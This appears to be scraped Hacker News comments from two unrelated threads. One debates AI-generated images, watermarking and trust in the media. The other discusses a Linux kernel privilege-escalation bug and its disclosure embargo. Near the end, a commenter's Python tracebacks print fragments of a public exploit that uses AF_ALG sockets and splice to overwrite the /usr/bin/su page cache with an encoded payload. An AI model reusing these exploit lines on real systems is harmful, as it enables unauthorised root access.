It's already possible to lie with text. Pixels are pixels. If we can't blindly believe pixels to show the truth, we will be simply back to the pre-photography era which managed to have a concept of truth regardless.
For the umpteenth time, scale and ease of access and propagation matters.
A knife and a handgun aren’t comparable to a machine gun and a bomb. When you have equal access to all of those, the damage you can enact is exponentiated.
You could lie with text before, but it took effort and time and skill to do it convincingly. You could also lie with images but they took even more time and effort and skill, greatly limiting the pool of people who could do it and the possible damage.
When anyone anywhere can convincingly lie and have it do two laps around the world in a matter of minutes, the whole game changes.
It’s becoming very hard to believe that people making arguments like yours are doing so in good faith. Maybe you’re not even a person but a shill bot. That’s a very real and trivial possibility today, which is the whole point and illustrates the problem.
That’s a non-sequitur. This has nothing to do with “mainstream media”. Which, by the way, is not a singular entity you can blindly trust or distrust, don’t fall into that indoctrination trap. This is basic despotic citizen control: Get everyone to distrust those who hold them accountable; label them as irredeemable liars so you can do as you please.
Edit: Removed swipes while keeping the core argument.
You’re right. I should’ve done better and apologise. I have lightly edited the post above to keep the core point while removing the swipes.
I disagree with the irony point on the basis that none of us here (I assume) is a despot or in a position of power high enough to lie to the point of discrediting entire institutions to the masses. We can be victims of it, but not perpetrators. Also, nowhere have I accused anyone in particular of being a liar. Still, given that my ill chosen words will have no doubt clouded your understanding of the point—which is on me—I won’t hold that against you, I take responsibility.
I haven't heard anything about this from the mainstream media. What bothers me is the amount of misinformation being published on social media that people are taking as truth, but now with photorealistic photos and videos. It used to be you could reverse image search something and show that it came from a previous event, or find the original in the case of doctored images.
Now that anyone can manufacture convincing images out of whole cloth, it becomes impossible for the typical user to determine if what they're seeing is legitimate; this means not only that people can manufacture images to push a false narrative but also discredit legitimate images as falsified.
The 'mainstream media is bad' narrative is one manufactured almost entirely by right-wing influencers and politicians to create an environment where they can discredit any actual evidence that doesn't align with what they or their base want to hear. Once anyone with integrity is inherently suspicious, the narrative can be set by anyone to push their agenda, and because they've demonized actual news reporting they can point to any other outlet that counters their claims and say 'look, they're lying to your face, you can't trust them!'
> the main thing is tracking, ID verification, constant social credit-like ratings, etc. That's what is coming.
Do you mean things like masked armed federal agents demanding to see your proof of citizenship or they'll lock you up (or sometimes just locking you up anyway)? Is that what's coming? Is that what you're afraid of? Or is that fine if it only happens to people you don't agree with?
These talking points, as always, are fearmongering designed to trigger paranoia in people so that they'll go along with whatever the people in charge say will fix things. No one on the left has proposed any of these things, but people on the right are constantly saying that's whats coming because it's what helps them keep their base frightened and compliant, and you've fallen for it (or are part of it, I don't know).
> AI media generation is a red herring, the main thing is tracking, ID verification, constant social credit-like ratings, etc. That's what is coming.
It can be both things.
I worry about tracking and the post-truth world of everything fake and AI slop infiltrating everything. And like the person you're arguing with is saying, just because slop/fakery was possible before doesn't mean the widespread scale that AI and the internet have unlocked is of no concern.
It's the same walled garden principle. Benevolent Google will protect you from synthetic media by embedding invisible watermarks, from malicious apps by blocking sideloading, from porn by ID verification, etc etc. It's the same principle.
Are you opposed to people knowing that AI-generated content is AI-generated? Or are you just imagining that this is the first step towards 'someone' controlling your every move online somehow?
You know what would be a good counter to that? Don't use AI generation tools if they implement that. The argument that 'we should let AI generated media be indistinguishable from the truth because what if Google does something you don't like at some point' is pretty flimsy.
You and I did whenever we assumed the pixels were an upload of a digitized photo taken with an actual camera of, say, a historical event, or something in nature (e.g. some rare bird), a birthday party, etc.
The photo could be staged (e.g. Cottingley Fairies), it could be altered physically (like cutting or painting over, e.g. Stalin), it could be cropped intentionally to tell a different story (plenty of examples), and more recently it could be photoshopped, etc. All of these were possible, though harder than it is now, but let's not pretend we didn't "trust pixels". We all did, just as we trusted newspaper photographs. Now that era must come to a firm end, and I believe it's a tragedy.
Fair enough. While I would kind of wish AI could be reliably detected, deep down I know this is impossible and it would be pretty bad if we had, say, a prosecution that succeeded because "this 'provably-non-AI' photo places you at the scene of the crime" because only a few underground people know how to remove a watermark.
You raise an interesting point about the artificial generation of evidence used in court. In 1992, Michael Crichton wrote the book Rising Sun, which centers around the editing of security camera video footage to coverup a murder.
I also wonder if being able to prove that an image or video isn’t AI generated would lend credence to it, while in reality there are other methods to produce falsified video.
Well, you just have to convince the jury. The defense attorney will try to throw up all the reasons it could be falsified, but the prosecutor will say "All of that is unlikely - the defense attorney would like you to believe that farfetched story, but this is still a compelling piece of evidence." This is how it always is with any kind of testimony and evidence.
What stops someone from adding a watermark to an actually photographed (carefully framed?) picture to discredit it? There is no certainty either way, just suggestions from someone else about what the truth might be.
AI watermarks only give the illusion of maintaining the concept of truth. The government and corporations will still have access to un-watermarked models to destroy the truth with.
The concept of truth? A bit overblown don't you think? Because some guy can make a realistic looking fake videos that destroys the "concept" of truth? How?
Stalin had all the resources imaginables at his disposal.
Now Nancy, a tech-phobic waitress who has a grudge against her coworker can make up an entire scenario with one prompt and her colleagues might blindly believe her.
Let's not pretend they're the same thing.
Gen AI is inevitable. Watermarking is likely futile. But in my opinion it is still very important to discuss how, as a society, we're going to live in a post-truth world now that anybody can, IN SECONDS, not only fabricate a story but also spread it to thousands of people through their social media.
When that idea was originated, the advice was more like:
"Don't trust what you see on the Internet. Trust instead what you read in a reputable daily newspaper, or Peter Jennings or Tom Brokaw on the nightly news, or BBC World News."
Today, the Internet, especially the part which is not trustable, has nearly finished killing most of the "trustworthy" news sources, by outcompeting them for ad dollars - by being way better at targeting ads (e.g. Meta) and by scientifically perfecting addiction (e.g. TikTok). What remains is mostly controlled by governments and has far from a perfect record of being fact-based and impartial.[1] There are a ton of independent people out there in good faith posting facts on the Internet, but we just agreed that we shouldn't trust what we see on the Internet.
So doesn't this become "Don't trust anything"? And doesn't that, in practice, get implemented as "Don't trust anything that challenges what you believe to be true"? This feels like a really, really bad change to our society - and I'd argue it's already completely happened.
This isn't just ads, trust in the mainstream media, itself, is very low [1], deservedly so in my opinion. The continuous lies by omission, the outright incorrect headlines/articles that they edit after a day, the lock-step messaging, alignment, and avoidance of topics, pushed by their respective political parties/billionaire owners (6 companies own 90% of media [2]), made me switch to more independent journalists.
I have no objection to this -- I follow a few that I would say meet that definition well and which I trust. But boy do I worry that for 90% of the population, this translates to picking a bunch of enthusiastic propagandists whose bias is far worse than MSNBC, Fox News, or CNN ever were. I assume our craven and corrupt political parties will increasingly focus on propping up "independent journalists" who repeat their talking points for them.
Adequately implementing solves one problem (the making up a story because of a grudge), but creates a whole new set of likely much worse problems: how does one maintain a democracy / civil society? It's not just the trust of "social media" that you've eroded, you've almost certainly killed trust in traditional news reporting as well, especially considering just how much of traditional media is discovered via social media.
Effective democracy requires an informed voter base. Society requires its constituents to be invested in its continuity. Neither of those is achievable when we completely discard trust.
Yes, it's happened. Except a lot of people do have an exception - they'll trust the slop that reinforces their existing biases, or even if they know in their hearts it's not true, viewing their side's lies regularly still has an effect on the way they think.
Good point. Sometimes I wonder if social media, just almost every aspect of it, is the real cancer. Allowing just about anyone (globally) to anonymously deploy information warfare via the social media vector just seems bound to have horrible outcomes. It's just as bad with text as with images or video. Because of social media, we've trained at least 3 separate generations to self-sort into camps with customized ideological info sources that have incredibly-low standards for fact-checking and every incentive to tell their audience (1) exactly what they want and (2) whatever will enrage them most.
AI kind of makes this worse, but also only barely. Because most people really ought to know by now that almost any content could be AI, a video of, say, Trump kicking a baby or violating a goat wouldn't convince anyone that those acts happened (unless they already believed they happened).
Thing is, we're so flooded in biased BS, and no one has any incentive to produce non-sensational, factual news. I absolutely see 'post-truth' as the inevitability. You can't "weed a garden" when it is 100% weeds. The term "news" will cease to mean facts, and just become a branch of entertainment. Kind of the way "Reality TV" went from being supposedly a documentary (e.g. COPS) to just being a flavor of entertainment, where nothing needs to be real.
Stalin controlled the state. The state controls companies. Companies control watermarking.
This sort of solution to the fake image problem, makes it easier for stalin not harder. If everyone can make fake images that is one thing. If only the dictator can, well that is much worse.
Why are humans powerless to do anything about this? Aren't we making the technology? It's kind of a big problem for the future of the justice system and politics.
I would hope so. If I can’t use my phone in the car because it distracts me from the road, they shouldn’t be putting an attention-grabbing movie on a truck.
In Asia these things have been around for decades -both for regular advertising but also for political advertising. That said, I would not be against banning them stateside. We already have too many ads.
No embargo exists (or could possibly exist) in the first place.
Linux is open source, so every patch fixing the security bug is immediately visible to everyone. There is no workaround to that by the very design how the kernel is developed. The "embargo" people talking about is the rather stupid notion that if people keep their mouth shut and not write "THIS IS A LPE" straight in the patch description, everyone can pretend vulnerability is not leaked until the "official" message in the mailing list is sent.
This approach might have been defensible before, but in LLM era, when people have automated pipelines feeding diffs straight from the mailing lists to SotA models asking to identify probable security issues fixed by those, it is both stupid and dangerous.
My (novice) understanding is that embargoes are intended to provide time to 1) develop a patch and 2) distribute the patch.
For Linux/public open source, what you said is right about 2). Once the patch is visible to anyone, it's trivial to identify exploits for unpatched systems. But 1) is still a valid use-case for embargoes for Linux vulns, right? Like, if this patch had taken a few weeks to develop before being confirmed working and published, that's potentially valid grounds for not sharing details during that time (within reason), no?
Linux does actually have a proper embargo process. But, you're correct that in this case it wouldn't usually have been followed anyway. Bugs like this are fixed multiple times a week, anyone with basic kernel knowledge can see that they are potentially LPEs.
Usually, nobody even bothers to check. LPEs like this are too common to even categorise effectively.
A link to the patch was posted in someone's X account. Someone else saw that and posted a working exploit in less than an hour (potentially exploited by an LLM, though other than the quick turnaround, claim not substantiated).
It seems like the embargo bit is a bit spun. The exploit is a reasonable extension of ideas from Copy Fail and was independently discovered in public (on X, it seems like) before Kim's "embargo" had expired. No one broke any trust, the independent discoverer just didn't follow as rigorous a process.
They're asking the nature of the third party's discovery/publishing. Someone on the inside who decided to leak it anonymously? Someone else who was able to access some private communication they shouldn't have been able to see? Or a third party who happened to discover the same vulnerability (which seems less unlikely than normal since this is so similar to Copy Fail), but didn't follow disclosure procedures?
I think I read on the bug's website that "No fix has been released". I understood that as there is no public fix, but maybe it only means it's not in a tagged version of the kernel and no hotfixed distro kernels have been released?
The fix has been commited to the git tree for the `netdev` linux subsystem fork. That's how it was noticed by the grsecurity guy who published an exploit. Then, it will be merged by linus either into a RC/master for the next linux minor version release, or into the patch releases branch by GregKH/Sasha for already-released versions. Or in this case, both, because it's a security fix.
I got line 5 to run and failed on line 8 due to lack of su. I'd need to find a user accessible setuid binary for it to work.
Traceback (most recent call last):
File "/data/data/com.termux/files/home/exploit.py", line 8, in <module>
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'
Now the socket is blocked. Also probably should have realized the socket is defined earlier than its called
Traceback (most recent call last):
File "/data/data/com.termux/files/home/exploit.py", line 9, in <module>
while i<len(e):c(f,i,e[i:i+4]);i+=4
^^^^^^^^^^^^^^^
File "/data/data/com.termux/files/home/exploit.py", line 5, in c
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
^^^^^^^^^^^^^^^^
File "/data/data/com.termux/files/usr/lib/python3.12/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
PermissionError: [Errno 13] Permission denied
(HN algorithms have killed some of your comments, perhaps because you posted the same URL too many times from a relatively new account? I’ve vouched for you, but keep in mind that it triggers antispam.)
Its not writing to the partition though is it? It is polluting the cache page via a write with a buffer overrun in the kernel. I don't think buffer overruns follow permissions.
reply